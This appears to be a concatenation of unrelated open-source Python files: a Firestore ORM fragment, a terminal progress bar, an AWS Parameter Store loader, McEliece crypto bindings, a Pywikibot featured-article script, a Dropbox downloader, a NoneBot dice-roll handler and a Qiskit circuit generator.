setattr(model, '_instance_modified', True)
for k, v in doc_dict.items():
field = model._meta.get_field_by_column_name(k)
# if missing field setting is set to "ignore" then
# get_field_by_column_name return None So, just skip this field
if field is None:
continue
# Check if it is Reference field
if isinstance(field, ReferenceField):
val = ReferenceFieldWrapper.from_doc_ref(model, field, field.field_value(v))
elif isinstance(field, NestedModel):
nested_doc_val = field.field_value(v)
if nested_doc_val:
val = NestedModelWrapper.from_model_dict(field, nested_doc_val)
else:
val = None
else:
val = field.field_value(v)
setattr(model, field.name, val)
# If parent key is None but here is parent key from doc then set the parent for this model
# This is case when you filter the documents parent key not auto set just set it
if not model.parent and parent_key is not None:
model.parent = parent_key
# If it is not nested model then set the id for this model
if not nested_doc:
# When getting document attach the IDField if there is no user specify
# it will prevent to generate new id everytime when document save
# For more information see issue #45 https://github.com/octabytes/FireO/issues/45
if model._meta.id is None:
model._meta.id = ('id', IDField())
setattr(model, '_id', doc.id)
# save the firestore reference doc so that further actions can be performed (i.e. collections())
model._meta.set_reference_doc(doc.reference)
# even though doc.reference currently points to self, there is no guarantee this will be true
# in the future, therefore we should store the create time and update time separate.
model._meta._firestore_create_time = doc.create_time
model._meta._firestore_update_time = doc.update_time
return model
class NestedModelWrapper:
"""Get nested document"""
@classmethod
def from_model_dict(cls, field, doc):
model = field.nested_model()
return ModelWrapper.from_query_result(model, doc, nested_doc=True)
class ReferenceFieldWrapper:
"""Get reference documents
If auto_load is True then load the document otherwise return `ReferenceDocLoader` object and later user can use
`get()` method to retrieve the document
"""
@classmethod
def from_doc_ref(cls, parent_model, field, ref):
if not ref:
return None
ref_doc = ReferenceDocLoader(parent_model, field, ref)
if field.auto_load:
return ref_doc.get()
return ref_doc
class ReferenceDocLoader:
"""Get reference doc and Convert into model instance"""
def __init__(self, parent_model, field, ref):
self.parent_model = parent_model
self.field = field
self.ref = ref
def get(self):
doc = self.ref.get()
if not doc.exists:
raise errors.ReferenceDocNotExist(f'{self.field.model_ref.collection_name}/{self.ref.id} not exist')
model = ModelWrapper.from_query_result(self.field.model_ref(), doc)
# if on_load method is defined then call it
if self.field.on_load:
method_name = self.field.on_load
getattr(self.parent_model, method_name)(model)
return model
|
the-stack_0_12329 | # -*- coding: utf-8 -*-
# Copyright: 2009 Nadia Alramli
# License: BSD
"""Draws an animated terminal progress bar
Usage:
p = ProgressBar("blue")
p.render(percentage, message)
"""
import terminal
import sys
class ProgressBar(object):
"""Terminal progress bar class"""
TEMPLATE = (
'%(percent)-2s%% %(color)s%(progress)s%(normal)s%(empty)s %(message)s\n'
)
PADDING = 7
def __init__(self, color=None, width=None, block='█', empty=' '):
"""
color -- color name (BLUE GREEN CYAN RED MAGENTA YELLOW WHITE BLACK)
width -- bar width (optinal)
block -- progress display character (default '█')
empty -- bar display character (default ' ')
"""
if color:
self.color = getattr(terminal, color.upper())
else:
self.color = ''
if width and width < terminal.COLUMNS - self.PADDING:
self.width = width
else:
# Adjust to the width of the terminal
self.width = terminal.COLUMNS - self.PADDING
self.block = block
self.empty = empty
self.progress = None
self.lines = 0
def render(self, percent, message = ''):
"""Print the progress bar
percent -- the progress percentage %
message -- message string (optional)
"""
inline_msg_len = 0
if message:
# The length of the first line in the message
inline_msg_len = len(message.splitlines()[0])
if inline_msg_len + self.width + self.PADDING > terminal.COLUMNS:
# The message is too long to fit in one line.
# Adjust the bar width to fit.
bar_width = terminal.COLUMNS - inline_msg_len -self.PADDING
else:
bar_width = self.width
# Check if render is called for the first time
if self.progress != None:
self.clear()
self.progress = (bar_width * percent) / 100
data = self.TEMPLATE % {
'percent': percent,
'color': self.color,
'progress': self.block * self.progress,
'normal': terminal.NORMAL,
'empty': self.empty * (bar_width - self.progress),
'message': message
}
sys.stdout.write(data)
sys.stdout.flush()
# The number of lines printed
self.lines = len(data.splitlines())
def clear(self):
"""Clear all printed lines"""
sys.stdout.write(
self.lines * (terminal.UP + terminal.BOL + terminal.CLEAR_EOL)
)
|
the-stack_0_12331 | """
Author : James McKain (@jjmckain)
Created : 2021-12-10
SCM Repo : https://github.com/Preocts/secretbox
"""
from __future__ import annotations
import logging
from typing import Any
from secretbox.aws_loader import AWSLoader
try:
import boto3
from botocore.exceptions import ClientError
except ImportError:
boto3 = None
try:
from mypy_boto3_ssm.client import SSMClient
except ImportError:
SSMClient = None
class AWSParameterStore(AWSLoader):
"""Load secrets from an AWS Parameter Store"""
def load_values(self, **kwargs: Any) -> bool:
"""
Load all secrets from AWS parameter store
Requires `aws_sstore_name` and `aws_region_name` keywords to be
provided or for those values to be in the environment variables
under `AWS_SSTORE_NAME` and `AWS_REGION_NAME`.
`aws_sstore_name` is the parameter name or prefix.
"""
if boto3 is None:
self.logger.debug("Skipping AWS loader, boto3 is not available.")
return False
self.populate_region_store_names(**kwargs)
if self.aws_sstore is None:
self.logger.warning("Missing parameter name")
return True # this isn't a failure on our part
aws_client = self.get_aws_client()
if aws_client is None:
self.logger.error("Invalid SSM client")
return False
# if the prefix contains forward slashes treat the last token as the key name
do_split = "/" in self.aws_sstore
try:
# ensure the http client doesn't write our sensitive payload to the logger
logging.getLogger("botocore.parsers").addFilter(self.secrets_filter)
args = {
"Path": self.aws_sstore,
"Recursive": True,
"MaxResults": 10,
"WithDecryption": True,
}
# loop through next page tokens, page size caps at 10
while True:
resp = aws_client.get_parameters_by_path(**args)
for param in resp["Parameters"] or []:
# remove the prefix
# we want /path/to/DB_PASSWORD to populate os.env.DB_PASSWORD
key = param["Name"].split("/")[-1] if do_split else param["Name"]
self.loaded_values[key] = param["Value"]
args["NextToken"] = resp.get("NextToken")
if not args["NextToken"]:
break
self.logger.debug("fetching next page: %s", args["NextToken"])
except ClientError as err:
self.log_aws_error(err)
return False
finally:
# remove our logging filter
logging.getLogger("botocore.parsers").removeFilter(self.secrets_filter)
self.logger.info(
"loaded %d parameters matching %s", len(self.loaded_values), self.aws_sstore
)
return True
def get_aws_client(self) -> SSMClient | None:
"""Make the connection"""
if self.aws_region is None:
self.logger.debug("Missing AWS region, cannot create client")
return None
return boto3.client(
service_name="ssm",
region_name=self.aws_region,
)
|
the-stack_0_12332 | import ctypes
from ctypes import c_int
from .lib import libmcleece
class PublicKey:
def __init__(self, data):
# check that length matches libmcleece length
self.data = data
def __bytes__(self):
return self.data
@classmethod
def size(cls):
return c_int.in_dll(libmcleece(), 'mcleece_crypto_box_PUBLIC_KEY_SIZE').value
class PrivateKey:
def __init__(self, data):
# check that length matches libmcleece length
self.data = data
def __bytes__(self):
return self.data
@classmethod
def size(cls):
return c_int.in_dll(libmcleece(), 'mcleece_crypto_box_SECRET_KEY_SIZE').value
@classmethod
def generate(cls):
pk_size = PublicKey.size()
sk_size = cls.size()
pk = (ctypes.c_uint8 * pk_size)()
sk = (ctypes.c_uint8 * sk_size)()
res = libmcleece().mcleece_crypto_box_keypair(ctypes.byref(pk), ctypes.byref(sk))
if res != 0:
return None
return PrivateKey(bytes(sk)), PublicKey(bytes(pk))
def get_nacl_public_key(self):
# truncate a copy of self.data, and pass to PrivateKey here...
from nacl.public import PrivateKey as nacl_PrivateKey
sodium_pkey_size = c_int.in_dll(libmcleece(), 'mcleece_crypto_box_SODIUM_PUBLIC_KEY_SIZE').value
return bytes(nacl_PrivateKey(self.data[:sodium_pkey_size]).public_key)
class SealedBox:
def __init__(self, key):
''' do something with the key here...
the decryption part is interesting, because libsodium needs both public+private keys
to do the decryption, but mcleece doesn't care about needing the public key.
But the *interface* doesn't have a good way to communicate that at the moment...
'''
self.public_key = self.secret_key = None
if isinstance(key, PublicKey):
self.public_key = (ctypes.c_uint8 * len(key.data)).from_buffer_copy(key.data)
elif isinstance(key, PrivateKey):
self.secret_key = (ctypes.c_uint8 * len(key.data)).from_buffer_copy(key.data)
pubkey = key.get_nacl_public_key()
self.public_key = (ctypes.c_uint8 * len(pubkey)).from_buffer_copy(pubkey)
@classmethod
def message_header_size(cls):
return c_int.in_dll(libmcleece(), 'mcleece_crypto_box_MESSAGE_HEADER_SIZE').value
def encrypt(self, msg):
if not self.public_key or len(self.public_key) < PublicKey.size():
raise Exception('not initialized for encryption!')
msg_size = len(msg)
msg = (ctypes.c_uint8 * msg_size).from_buffer_copy(msg)
ciphertext_size = msg_size + self.message_header_size()
ciphertext = (ctypes.c_uint8 * ciphertext_size)()
res = libmcleece().mcleece_crypto_box_seal(
ctypes.byref(ciphertext), ctypes.byref(msg), ctypes.c_uint32(msg_size), ctypes.byref(self.public_key)
)
if res != 0:
return None
return bytes(bytearray(ciphertext))
def decrypt(self, ciphertext):
if not self.secret_key or len(self.secret_key) < PrivateKey.size():
raise Exception('not initialized for decryption!')
ciphertext_size = len(ciphertext)
ciphertext = (ctypes.c_uint8 * ciphertext_size).from_buffer_copy(ciphertext)
msg_size = ciphertext_size - self.message_header_size()
msg = (ctypes.c_uint8 * msg_size)()
res = libmcleece().mcleece_crypto_box_seal_open(
ctypes.byref(msg), ctypes.byref(ciphertext), ctypes.c_uint32(ciphertext_size),
ctypes.byref(self.public_key), ctypes.byref(self.secret_key)
)
if res != 0:
return None
return bytes(bytearray(msg))
|
the-stack_0_12334 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Manage featured/good article/list status template.
*** This script understands various command-line arguments: ***
Task commands:
-featured use this script for featured articles. Default task
if no task command is specified
-good use this script for good articles.
-lists use this script for featured lists.
-former use this script for removing {{Link FA|xx}} from former
fearured articles
NOTE: you may have all of these commands in one run
Option commands:
-interactive: ask before changing each page
-nocache doesn't include cache files file to remember if the article
already was verified.
-nocache:xx,yy you may ignore language codes xx,yy,... from cache file
-fromlang:xx,yy xx,yy,zz,.. are the languages to be verified.
-fromlang:ar--fi Another possible with range the languages
-fromall to verify all languages.
-tolang:xx,yy xx,yy,zz,.. are the languages to be updated
-after:zzzz process pages after and including page zzzz
(sorry, not implemented yet)
-side use -side if you want to move all {{Link FA|lang}} next
to the corresponding interwiki links. Default is placing
{{Link FA|lang}} on top of the interwiki links.
(This option is deprecated with wikidata)
-count Only counts how many featured/good articles exist
on all wikis (given with the "-fromlang" argument) or
on several language(s) (when using the "-fromall" argument).
Example: python pwb.py featured -fromlang:en,he -count
counts how many featured articles exist in the en and he
wikipedias.
-quiet no corresponding pages are displayed.
"""
#
# (C) Maxim Razin, 2005
# (C) Leonardo Gregianin, 2005-2008
# (C) xqt, 2009-2019
# (C) Pywikibot team, 2005-2019
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, division, unicode_literals
import pickle
import re
import pywikibot
from pywikibot import i18n, textlib, config
from pywikibot.pagegenerators import PreloadingGenerator
from pywikibot.tools.formatter import color_format
from pywikibot.tools import issue_deprecation_warning, PY2
if not PY2:
unichr = chr
def CAT(site, name, hide):
name = site.namespace(14) + ':' + name
cat = pywikibot.Category(site, name)
for article in cat.articles(endsort=hide):
yield article
if hide:
for article in cat.articles(startFrom=unichr(ord(hide) + 1)):
yield article
def BACK(site, name, hide): # pylint: disable=unused-argument
p = pywikibot.Page(site, name, ns=10)
return [page for page in p.getReferences(follow_redirects=False,
only_template_inclusion=True)]
def DATA(site, name, hide):
dp = pywikibot.ItemPage(site.data_repository(), name)
try:
title = dp.getSitelink(site)
except pywikibot.NoPage:
return
cat = pywikibot.Category(site, title)
if isinstance(hide, dict):
hide = hide.get(site.code)
for article in cat.articles(endsort=hide):
yield article
if hide:
for article in cat.articles(startsort=unichr(ord(hide) + 1)):
yield article
# not implemented yet
def TMPL(site, name, hide): # pylint: disable=unused-argument
return
# ALL wikis use 'Link FA', and sometimes other localized templates.
# We use _default AND the localized ones
template = {
'_default': ['Link FA'],
'als': ['LinkFA'],
'an': ['Destacato', 'Destacau'],
'ar': ['وصلة مقالة مختارة'],
'ast': ['Enllaz AD'],
'az': ['Link FM'],
'br': ['Liamm PuB', 'Lien AdQ'],
'ca': ['Enllaç AD', 'Destacat'],
'cy': ['Cyswllt erthygl ddethol', 'Dolen ED'],
'eo': ['LigoElstara'],
'en': ['Link FA', 'FA link'],
'es': ['Destacado'],
'eu': ['NA lotura'],
'fr': ['Lien AdQ'],
'fur': ['Leam VdC'],
'ga': ['Nasc AR'],
'gl': ['Ligazón AD', 'Destacado'],
'hi': ['Link FA', 'Lien AdQ'],
'is': ['Tengill ÚG'],
'it': ['Link V', 'Link AdQ'],
'no': ['Link UA'],
'oc': ['Ligam AdQ', 'Lien AdQ'],
'ro': ['Legătură AC', 'Legătură AF'],
'sv': ['UA', 'Link UA'],
'tr': ['Link SM'],
'vi': ['Liên kết chọn lọc'],
'vo': ['Yüm YG'],
'yi': ['רא'],
}
template_good = {
'_default': ['Link GA'],
'ar': ['وصلة مقالة جيدة'],
'ca': ['Enllaç AB', 'Lien BA', 'Abo'],
'da': ['Link GA', 'Link AA'],
'eo': ['LigoLeginda'],
'es': ['Bueno'],
'fr': ['Lien BA'],
'gl': ['Ligazón AB'],
'is': ['Tengill GG'],
'it': ['Link VdQ'],
'nn': ['Link AA'],
'no': ['Link AA'],
'pt': ['Bom interwiki'],
# 'tr': ['Link GA', 'Link KM'],
'vi': ['Liên kết bài chất lượng tốt'],
'wo': ['Lien BA'],
}
template_lists = {
'_default': ['Link FL'],
'no': ['Link GL'],
}
featured_name = {
'wikidata': (DATA, 'Q4387444'),
}
good_name = {
'wikidata': (DATA, 'Q7045856'),
}
lists_name = {
'wikidata': (TMPL, 'Q5857568'),
'ar': (BACK, 'قائمة مختارة'),
'da': (BACK, 'FremragendeListe'),
'de': (BACK, 'Informativ'),
'en': (BACK, 'Featured list'),
'fa': (BACK, 'فهرست برگزیده'),
'id': (BACK, 'Featured list'),
'ja': (BACK, 'Featured List'),
'ksh': (CAT, 'Joode Leß'),
'no': (BACK, 'God liste'),
'pl': (BACK, 'Medalista'),
'pt': (BACK, 'Anexo destacado'),
'ro': (BACK, 'Listă de calitate'),
'ru': (BACK, 'Избранный список или портал'),
'tr': (BACK, 'Seçkin liste'),
'uk': (BACK, 'Вибраний список'),
'vi': (BACK, 'Sao danh sách chọn lọc'),
'zh': (BACK, '特色列表'),
}
# Third parameter is the sort key indicating articles to hide from the given
# list
former_name = {
'wikidata': (DATA, 'Q7045853', {'en': '#'})
}
class FeaturedBot(pywikibot.Bot):
"""Featured article bot."""
# Bot configuration.
# Only the keys of the dict can be passed as init options
# The values are the default values
def __init__(self, **kwargs):
"""Only accepts options defined in availableOptions."""
self.availableOptions.update({
'async': False, # True for asynchronously putting a page
'afterpage': '!',
'count': False, # featuredcount
'featured': False,
'former': False,
'fromall': False,
'fromlang': None,
'good': False,
'lists': False,
'nocache': [],
'side': False, # not template_on_top
'quiet': False,
'interactive': False,
})
super(FeaturedBot, self).__init__(**kwargs)
self.cache = {}
self.filename = None
self.site = pywikibot.Site()
self.repo = self.site.data_repository()
# if no source site is given, give up
if self.getOption('fromlang') is True:
self.options['fromlang'] = False
# setup tasks running
self.tasks = []
for task in ('featured', 'good', 'lists', 'former'):
if self.getOption(task):
self.tasks.append(task)
if not self.tasks:
self.tasks = ['featured']
def itersites(self, task):
"""Generator for site codes to be processed."""
def _generator():
if task == 'good':
item_no = good_name['wikidata'][1]
elif task == 'featured':
item_no = featured_name['wikidata'][1]
elif task == 'former':
item_no = former_name['wikidata'][1]
dp = pywikibot.ItemPage(self.repo, item_no)
dp.get()
for key in sorted(dp.sitelinks.keys()):
try:
site = self.site.fromDBName(key)
except pywikibot.SiteDefinitionError:
pywikibot.output('"%s" is not a valid site. Skipping...'
% key)
else:
if site.family == self.site.family:
yield site
generator = _generator()
if self.getOption('fromall'):
return generator
elif self.getOption('fromlang'):
fromlang = self.getOption('fromlang')
if len(fromlang) == 1 and fromlang[0].find('--') >= 0:
start, end = fromlang[0].split('--', 1)
if not start:
start = ''
if not end:
end = 'zzzzzzz'
return (site for site in generator
if site.code >= start and site.code <= end)
else:
return (site for site in generator if site.code in fromlang)
else:
pywikibot.warning('No sites given to verify %s articles.\n'
'Please use -fromlang: or fromall option\n'
% task)
return ()
def hastemplate(self, task):
add_tl, remove_tl = self.getTemplateList(self.site.code, task)
for i, tl in enumerate(add_tl):
tp = pywikibot.Page(self.site, tl, ns=10)
if tp.exists():
return True
else:
pywikibot.output(tl + ' does not exist')
# The first item is the default template to be added.
# It must exist. Otherwise the script must not run.
if i == 0:
return
else:
return
def readcache(self, task):
if self.getOption('count') or self.getOption('nocache') is True:
return
self.filename = pywikibot.config.datafilepath('cache', task)
try:
f = open(self.filename, 'rb')
self.cache = pickle.load(f)
f.close()
pywikibot.output('Cache file %s found with %d items.'
% (self.filename, len(self.cache)))
except IOError:
pywikibot.output('Cache file %s not found.' % self.filename)
def writecache(self):
if self.getOption('count'):
return
if not self.getOption('nocache') is True:
pywikibot.output('Writing %d items to cache file %s.'
% (len(self.cache), self.filename))
with open(self.filename, 'wb') as f:
pickle.dump(self.cache, f, protocol=config.pickle_protocol)
self.cache = {}
def run(self):
for task in self.tasks:
self.run_task(task)
pywikibot.output('%d pages written.' % self._save_counter)
def run_task(self, task):
if not self.hastemplate(task):
pywikibot.output('\nNOTE: %s articles are not implemented at %s.'
% (task, self.site))
return
self.readcache(task)
for site in self.itersites(task):
try:
self.treat(site, task)
except KeyboardInterrupt:
pywikibot.output('\nQuitting %s treat...' % task)
break
self.writecache()
def treat(self, fromsite, task):
if fromsite != self.site:
self.featuredWithInterwiki(fromsite, task)
def featuredArticles(self, site, task, cache):
articles = []
info = globals()[task + '_name']
if task == 'lists':
code = site.code
else:
code = 'wikidata'
try:
method = info[code][0]
except KeyError:
pywikibot.error(
"language %s doesn't has %s category source."
% (code, task))
return
name = info[code][1]
# hide #-sorted items on en-wiki
try:
hide = info[code][2]
except IndexError:
hide = None
for p in method(site, name, hide):
if p.namespace() == 0: # Article
articles.append(p)
# Article talk (like in English)
elif p.namespace() == 1 and site.code != 'el':
articles.append(pywikibot.Page(p.site,
p.title(with_ns=False)))
pywikibot.output(color_format(
'{lightred}** {0} has {1} {2} articles{default}',
site, len(articles), task))
while articles:
p = articles.pop(0)
if p.title() < self.getOption('afterpage'):
continue
if '/' in p.title() and p.namespace() != 0:
pywikibot.output('%s is a subpage' % p.title())
continue
if p.title() in cache:
pywikibot.output('(cached) %s -> %s' % (
p.title(), cache[p.title()]))
continue
yield p
def findTranslated(self, page, oursite=None):
quiet = self.getOption('quiet')
if not oursite:
oursite = self.site
if page.isRedirectPage():
page = page.getRedirectTarget()
ourpage = None
for link in page.iterlanglinks():
if link.site == oursite:
ourpage = pywikibot.Page(link)
break
if not ourpage:
if not quiet:
pywikibot.output('%s -> no corresponding page in %s'
% (page.title(), oursite))
elif ourpage.section():
pywikibot.output('%s -> our page is a section link: %s'
% (page.title(), ourpage.title()))
elif not ourpage.exists():
pywikibot.output("%s -> our page doesn't exist: %s"
% (page.title(), ourpage.title()))
else:
if ourpage.isRedirectPage():
ourpage = ourpage.getRedirectTarget()
pywikibot.output('%s -> corresponding page is %s'
% (page.title(), ourpage.title()))
if ourpage.namespace() != 0:
pywikibot.output('%s -> not in the main namespace, skipping'
% page.title())
elif ourpage.isRedirectPage():
pywikibot.output(
'%s -> double redirect, skipping' % page.title())
elif not ourpage.exists():
pywikibot.output("%s -> page doesn't exist, skipping"
% ourpage.title())
else:
backpage = None
for link in ourpage.iterlanglinks():
if link.site == page.site:
backpage = pywikibot.Page(link)
break
if not backpage:
pywikibot.output(
'%s -> no back interwiki ref' % page.title())
elif backpage == page:
# everything is ok
yield ourpage
elif backpage.isRedirectPage():
backpage = backpage.getRedirectTarget()
if backpage == page:
# everything is ok
yield ourpage
else:
pywikibot.output(
'%s -> back interwiki ref target is redirect to %s'
% (page.title(), backpage.title()))
else:
pywikibot.output('%s -> back interwiki ref target is %s'
% (page.title(), backpage.title()))
def getTemplateList(self, code, task):
add_templates = []
remove_templates = []
if task == 'featured':
try:
add_templates = template[code]
add_templates += template['_default']
except KeyError:
add_templates = template['_default']
try:
remove_templates = template_good[code]
remove_templates += template_good['_default']
except KeyError:
remove_templates = template_good['_default']
elif task == 'good':
try:
add_templates = template_good[code]
add_templates += template_good['_default']
except KeyError:
add_templates = template_good['_default']
try:
remove_templates = template[code]
remove_templates += template['_default']
except KeyError:
remove_templates = template['_default']
elif task == 'lists':
try:
add_templates = template_lists[code]
add_templates += template_lists['_default']
except KeyError:
add_templates = template_lists['_default']
else: # task == 'former'
try:
remove_templates = template[code]
remove_templates += template['_default']
except KeyError:
remove_templates = template['_default']
return add_templates, remove_templates
def featuredWithInterwiki(self, fromsite, task):
"""Read featured articles and find the corresponding pages.
Find corresponding pages on other sites, place the template and
remember the page in the cache dict.
"""
tosite = self.site
if fromsite.code not in self.cache:
self.cache[fromsite.code] = {}
if tosite.code not in self.cache[fromsite.code]:
self.cache[fromsite.code][tosite.code] = {}
cc = self.cache[fromsite.code][tosite.code]
if self.getOption('nocache') is True or \
fromsite.code in self.getOption('nocache'):
cc = {}
gen = self.featuredArticles(fromsite, task, cc)
if self.getOption('count'):
next(gen, None)
return # count only, we are ready here
gen = PreloadingGenerator(gen)
for source in gen:
if source.isRedirectPage():
source = source.getRedirectTarget()
if not source.exists():
pywikibot.output("source page doesn't exist: %s"
% source)
continue
for dest in self.findTranslated(source, tosite):
self.add_template(source, dest, task, fromsite)
cc[source.title()] = dest.title()
def add_template(self, source, dest, task, fromsite):
"""Place or remove the Link_GA/FA template on/from a page."""
def compile_link(site, templates):
"""Compile one link template list."""
findtemplate = '(%s)' % '|'.join(templates)
return re.compile(r'\{\{%s\|%s\}\}'
% (findtemplate.replace(' ', '[ _]'),
site.code), re.IGNORECASE)
tosite = dest.site
add_tl, remove_tl = self.getTemplateList(tosite.code, task)
re_link_add = compile_link(fromsite, add_tl)
re_link_remove = compile_link(fromsite, remove_tl)
text = dest.text
m1 = add_tl and re_link_add.search(text)
m2 = remove_tl and re_link_remove.search(text)
changed = False
interactive = self.getOption('interactive')
if add_tl:
if m1:
pywikibot.output('(already added)')
else:
# insert just before interwiki
if (not interactive
or pywikibot.input_yn(
'Connecting %s -> %s. Proceed?'
% (source.title(), dest.title()),
default=False, automatic_quit=False)):
if self.getOption('side'):
# Placing {{Link FA|xx}} right next to
# corresponding interwiki
text = (text[:m1.end()]
+ ' {{%s|%s}}' % (add_tl[0], fromsite.code)
+ text[m1.end():])
else:
# Moving {{Link FA|xx}} to top of interwikis
iw = textlib.getLanguageLinks(text, tosite)
text = textlib.removeLanguageLinks(text, tosite)
text += '%s{{%s|%s}}%s' % (
config.LS, add_tl[0], fromsite.code, config.LS)
text = textlib.replaceLanguageLinks(text,
iw, tosite)
changed = True
if remove_tl:
if m2:
if (changed # Don't force the user to say "Y" twice
or not interactive
or pywikibot.input_yn(
'Connecting %s -> %s. Proceed?'
% (source.title(), dest.title()),
default=False, automatic_quit=False)):
text = re.sub(re_link_remove, '', text)
changed = True
elif task == 'former':
pywikibot.output('(already removed)')
if changed:
comment = i18n.twtranslate(tosite, 'featured-' + task,
{'page': source})
try:
dest.put(text, comment)
self._save_counter += 1
except pywikibot.LockedPage:
pywikibot.output('Page %s is locked!'
% dest.title())
except pywikibot.PageNotSaved:
pywikibot.output('Page not saved')
def main(*args):
"""
Process command line arguments and invoke bot.
If args is an empty list, sys.argv is used.
@param args: command line arguments
@type args: unicode
"""
options = {}
local_args = pywikibot.handle_args(args)
issue_deprecation_warning(
'featured.py script', 'Wikibase Client extension',
0, UserWarning, since='20160307')
for arg in local_args:
if arg.startswith('-fromlang:'):
options[arg[1:9]] = arg[10:].split(',')
elif arg.startswith('-after:'):
options['afterpage'] = arg[7:]
elif arg.startswith('-nocache:'):
options[arg[1:8]] = arg[9:].split(',')
else:
options[arg[1:].lower()] = True
bot = FeaturedBot(**options)
bot.run()
if __name__ == '__main__':
main()
|
the-stack_0_12335 | # -*- coding: utf-8 -*-
import urllib3
from dropbox import client, rest
import os
class DropboxDownloader:
def __init__(self, token_path):
self.api_client = None
urllib3.disable_warnings()
self.__oauth2(token_path)
def __oauth2(self, token_path):
with open(token_path) as f:
serialized_token = f.read()
if serialized_token.startswith('oauth2:'):
access_token = serialized_token[len('oauth2:'):]
self.api_client = client.DropboxClient(access_token)
else:
print('token error')
def do_ls(self):
resp = self.api_client.metadata('')
file_list = []
if 'contents' in resp:
for f in resp['contents']:
name = os.path.basename(f['path'])
file_list.append(name)
return file_list
def do_get(self, from_path, to_path):
to_file = open(to_path, "wb")
f, metadata = self.api_client.get_file_and_metadata(from_path)
#print 'Metadata:', metadata
to_file.write(f.read())
|
the-stack_0_12336 | import re
from nonebot import on_message, on_command
from nonebot.adapters import Bot, Event
from nonebot.log import logger
from nonebot.adapters.cqhttp.permission import GROUP
from nonebot.adapters.cqhttp.message import Message
from nonebot.rule import regex
from .common import START, SEP, CONF
from .roll import roll
RE_ROLL_STR = (
"^(" # 1
+ START
+ CONF.i7s_roll_command
+ " |"
+ CONF.i7s_roll_trigger
# 2 3 4 5 6
+ r" )([0-9adgimnsuvx+\- ]+)( ?(结果)?(大于|小于|大于等于|小于等于|>=|>|<|<=) ?(-?\d{1,10}))?"
)
RE_ROLL_CMD = re.compile(RE_ROLL_STR)
async def roll_command_handler(bot: Bot, event: Event, state: dict):
messages = []
logger.info(f"[7sRoll] received roll command: {event.raw_message}")
if await GROUP(bot, event):
messages.append(f"[CQ:at,qq={event.user_id}]")
match = None
if "_match" in state:
match = state["_matched"]
else:
args = str(event.raw_message).strip()
match = RE_ROLL_CMD.match(args)
if not match:
messages.append("roll 命令格式错误")
messages.append("格式为:roll <表达式>[ <判断方式><目标>]")
messages.append("表达式举例:3d6+1d3-1")
messages.append("判断方式可选:>, <, <=, >=, 或对应中文")
messages.append("目标:需要达成的点数")
return await cmd_roll.finish(Message("\n".join(messages)))
if match.group(1) is None:
return
expr_str, op_str, target = match.group(2, 5, 6)
messages.extend(roll(expr_str, op_str, target))
return await cmd_roll.finish(Message("\n".join(messages)))
cmd_roll = on_command(CONF.i7s_roll_command, priority=1, block=True)
cmd_roll.handle()(roll_command_handler)
message_cmd_roll = on_message(rule=regex(RE_ROLL_STR), priority=2, block=True)
message_cmd_roll.handle()(roll_command_handler)
|
the-stack_0_12337 | # qubit number=4
# total number=40
import cirq
import qiskit
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2
import numpy as np
import networkx as nx
def bitwise_xor(s: str, t: str) -> str:
length = len(s)
res = []
for i in range(length):
res.append(str(int(s[i]) ^ int(t[i])))
return ''.join(res[::-1])
def bitwise_dot(s: str, t: str) -> str:
length = len(s)
res = 0
for i in range(length):
res += int(s[i]) * int(t[i])
return str(res % 2)
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f
# NOTE: use multi_control_toffoli_gate ('noancilla' mode)
# https://qiskit.org/documentation/_modules/qiskit/aqua/circuits/gates/multi_control_toffoli_gate.html
# https://quantumcomputing.stackexchange.com/questions/3943/how-do-you-implement-the-toffoli-gate-using-only-single-qubit-and-cnot-gates
# https://quantumcomputing.stackexchange.com/questions/2177/how-can-i-implement-an-n-bit-toffoli-gate
controls = QuantumRegister(n, "ofc")
target = QuantumRegister(1, "oft")
oracle = QuantumCircuit(controls, target, name="Of")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
oracle.mct(controls, target[0], None, mode='noancilla')
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[3]) # number=23
prog.rx(-0.6848671984825748,input_qubit[1]) # number=26
prog.cz(input_qubit[0],input_qubit[3]) # number=24
prog.h(input_qubit[3]) # number=25
prog.cx(input_qubit[0],input_qubit[3]) # number=17
prog.h(input_qubit[3]) # number=37
prog.cz(input_qubit[0],input_qubit[3]) # number=38
prog.h(input_qubit[3]) # number=39
prog.x(input_qubit[3]) # number=31
prog.cx(input_qubit[0],input_qubit[3]) # number=32
prog.h(input_qubit[3]) # number=33
prog.cz(input_qubit[0],input_qubit[3]) # number=34
prog.h(input_qubit[3]) # number=35
prog.cx(input_qubit[0],input_qubit[3]) # number=15
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=3
prog.h(input_qubit[3]) # number=4
prog.y(input_qubit[3]) # number=12
prog.h(input_qubit[0]) # number=5
oracle = build_oracle(n-1, f)
prog.append(oracle.to_gate(),[input_qubit[i] for i in range(n-1)]+[input_qubit[n-1]])
prog.h(input_qubit[1]) # number=6
prog.h(input_qubit[2]) # number=7
prog.cx(input_qubit[3],input_qubit[0]) # number=20
prog.z(input_qubit[3]) # number=21
prog.h(input_qubit[0]) # number=27
prog.cz(input_qubit[3],input_qubit[0]) # number=28
prog.h(input_qubit[0]) # number=29
prog.h(input_qubit[3]) # number=8
prog.h(input_qubit[0]) # number=9
prog.y(input_qubit[2]) # number=10
prog.h(input_qubit[1]) # number=36
prog.y(input_qubit[2]) # number=11
# circuit end
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
a = "111"
b = "0"
f = lambda rep: bitwise_xor(bitwise_dot(a, rep), b)
prog = make_circuit(4,f)
backend = BasicAer.get_backend('qasm_simulator')
sample_shot =8000
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit2535.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.__len__(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
|
